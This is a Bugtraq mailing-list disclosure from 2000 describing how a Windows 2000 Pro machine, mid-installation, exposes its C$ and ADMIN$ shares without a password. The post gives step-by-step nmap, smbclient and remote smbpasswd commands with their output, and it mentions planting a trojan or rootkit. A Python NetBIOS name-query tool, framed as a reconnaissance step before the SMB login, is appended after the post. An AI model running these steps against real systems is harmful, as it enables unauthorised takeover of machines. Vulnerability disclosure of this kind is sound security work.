Bugtraq mailing list archives

Re: Windows 2000 installation process weakness


From: Stephane.Aubert () HSC FR (Stephane Aubert)
Date: Wed, 23 Feb 2000 14:57:47 +0100


Hello,

As a lot of people asked me for information on the insecure win2k pro
installation process, we wish to provide further information on this
vulnerability.

All these tests were made and checked with Denis Ducamp and
Alain Thivillon, two serious security experts.

What we have done:

  1. Install the final release of win2k pro (build 2195)

  2. Do not give any IP address during the install. If no DHCP server
     is responding, the win2k pro box takes 169.254.153.13 as its IP address.
     (The address range used is 169.254.0.0/16, which is registered
     with the IANA as the LINKLOCAL net.)

  Notice: if a real IP address is given by the admin or a DHCP server,
  you can connect directly, and jump to step 4 right now.

  3. On your favorite Linux (or *BSD) box, add an alias to the interface:
     # ifconfig eth0:0 169.254.153.11

  4. Just after the configuration of COM+ by win2k, you can ping or scan it:

     % nmap 169.254.153.13
     Starting nmap V. 2.3BETA10 by Fyodor (fyodor () dhp com, www.insecure.org/nmap/)
     Interesting ports on  (169.254.153.13):
     Port    State       Protocol  Service
     139     open        tcp       netbios-ssn

     # nmap  -sU -p 1-200 169.254.153.13
     Starting nmap V. 2.3BETA10 by Fyodor (fyodor () dhp com, www.insecure.org/nmap/)
     Interesting ports on  (169.254.153.13):
     Port    State       Protocol  Service
     137     open        udp       netbios-ns
     138     open        udp       netbios-dgm

  Notice: the administrator has already entered a password!!!

  5. By now, you can connect via SMB (smbclient for example)
     to the C$ or ADMIN$ share WITHOUT ANY PASSWORD !!!

     This lasts until win2k asks the admin to reboot the computer.

     Notice: it's possible to use NAT (NetBIOS Auditing Tool)
     to obtain the NetBIOS name of the Windows box and the shares.

     % ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
     added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
     Password: <EMPTY>
     Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
     smb: \> ls
      IO.SYS                            HSR    40992  Tue May 31 06:22:00 1994
      MSDOS.SYS                         HSR    38166  Tue May 31 06:22:00 1994
      COMMAND.COM                         R    56286  Tue May 31 06:22:00 1994
      WINA20.386                          A     9349  Tue May 31 06:22:00 1994
      CONFIG.SYS                          A      638  Fri Feb 18 15:34:00 2000
      AUTOEXEC.BAT                        A      690  Fri Feb 18 15:33:10 2000

  6. Worse !
     You can SET (remotely) a new administrator password:

     % ./smbpasswd -U administrator -r groar
     Old SMB password: <EMPTY>
     New SMB password: <NEWPASS>
     Retype new SMB password: <NEWPASS>
     startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
     unable to open smb password database.
     Password changed for user administrator.

    By now, nobody, not even the administrator, even after the reboot, can
    connect (remotely or locally) without the NEW password.

    The administrator has to crack his own computer ;-))

  7. Worse !
     It is also (obviously) possible to transfer a trojan to the new
     computer, or just a rootkit (www.rootkit.com), in order to keep
     administrator privileges for a long time :(

Regards,
Stéphane

--
Stephane AUBERT                   -=-      Herve Schauer Consultants
Stephane.Aubert () hsc fr                            http://www.hsc.fr/
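As an added example (not part of the post above, and not the code of NAT or any other tool the post names): the NetBIOS node-status (NBSTAT) request that NAT or nmblookup send to UDP/137 to recover the machine's NetBIOS name before step 5, written in Python from RFC 1001/1002. The host name GROAR, the workgroup and the MAC address in the constructed sample reply are invented for the example; query_node_status is the only function that touches the network, and it assumes a reachable host.

```python
"""NBSTAT (node status) query builder and parser, RFC 1001/1002.
Added example: the sample reply below is constructed, not a captured packet."""
import socket
import struct
from dataclasses import dataclass

NBSTAT_TYPE = 0x0021      # RR type NBSTAT (node status)
CLASS_IN = 0x0001
NB_GROUP_FLAG = 0x8000    # bit G of NAME_FLAGS: name is a group name
SUFFIX_WORKSTATION = 0x00
SUFFIX_FILE_SERVER = 0x20  # registered only when the Server service is up


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 section 14.1): pad the name to 15 bytes,
    append the suffix byte, then emit each nibble as a letter 'A'..'P'."""
    pad = b"\x00" if name == "*" else b" "    # the wildcard is NUL padded
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def build_nbstat_query(txid: int = 0x1234) -> bytes:
    """Node status request for the wildcard name '*' (what NAT/nbtscan send)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    qname = b"\x20" + encode_netbios_name("*") + b"\x00"
    return header + qname + struct.pack(">HH", NBSTAT_TYPE, CLASS_IN)


def _skip_name(data: bytes, pos: int) -> int:
    """Offset just past an RR name (label sequence or a 0xC0 pointer)."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated name")
        length = data[pos]
        if length & 0xC0 == 0xC0:            # compression pointer, 2 bytes
            return pos + 2
        pos += 1 + length
        if length == 0:
            return pos


@dataclass
class NbName:
    name: str
    suffix: int
    group: bool


@dataclass
class NodeStatus:
    names: list
    mac: str

    @property
    def hostname(self):
        return next((n.name for n in self.names
                     if n.suffix == SUFFIX_WORKSTATION and not n.group), None)

    @property
    def workgroup(self):
        return next((n.name for n in self.names
                     if n.suffix == SUFFIX_WORKSTATION and n.group), None)

    @property
    def serves_files(self) -> bool:
        """<20> present means C$/ADMIN$ style shares can be reached over SMB."""
        return any(n.suffix == SUFFIX_FILE_SERVER for n in self.names)


def parse_nbstat_response(data: bytes, expected_txid=None) -> NodeStatus:
    if len(data) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", data[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an answer")
    pos = 12
    for _ in range(qdcount):                 # skip an echoed question, if any
        pos = _skip_name(data, pos) + 4
    pos = _skip_name(data, pos)
    rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT_TYPE or rclass != CLASS_IN:
        raise ValueError("unexpected RR type")
    rdata = data[pos:pos + rdlen]
    if rdlen < 1 or len(rdata) != rdlen:
        raise ValueError("truncated rdata")
    names, off = [], 1
    for _ in range(rdata[0]):                # 15-byte name, suffix, 2-byte flags
        entry = rdata[off:off + 18]
        if len(entry) < 18:
            raise ValueError("truncated name entry")
        name = entry[:15].rstrip(b" \x00").decode("ascii", "replace")
        group = bool(struct.unpack(">H", entry[16:])[0] & NB_GROUP_FLAG)
        names.append(NbName(name, entry[15], group))
        off += 18
    mac = rdata[off:off + 6]                 # statistics start with the MAC
    if len(mac) < 6:
        raise ValueError("truncated statistics")
    return NodeStatus(names, ":".join(f"{b:02x}" for b in mac))


def build_sample_response(txid: int = 0x1234) -> bytes:
    """Constructed reply of an invented box GROAR in WORKGROUP (sample data)."""
    def entry(name, suffix, flags):
        return name.encode().ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)
    rdata = (bytes([3]) + entry("GROAR", 0x00, 0x0400) + entry("GROAR", 0x20, 0x0400)
             + entry("WORKGROUP", 0x00, 0x8400) + bytes.fromhex("000c29112233") + b"\x00" * 40)
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = b"\x20" + encode_netbios_name("*") + b"\x00" + struct.pack(">HHIH", NBSTAT_TYPE, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def query_node_status(ip: str, timeout: float = 2.0) -> NodeStatus:
    """Send the query on the wire (needs a reachable host answering UDP/137)."""
    txid = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(txid), (ip, 137))
        data, _ = s.recvfrom(4096)
    return parse_nbstat_response(data, txid)


if __name__ == "__main__":
    st = parse_nbstat_response(build_sample_response(), 0x1234)
    print(st.hostname, st.workgroup, st.serves_files, st.mac)  # GROAR WORKGROUP True 00:0c:29:11:22:33
```

Once the name is known, the smbclient line from step 5 follows directly (`-I` with the link-local address, the recovered name in the share path); the <20> check is the quick way to tell, before trying SMB, whether the box is already in the window where the Server service is up.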


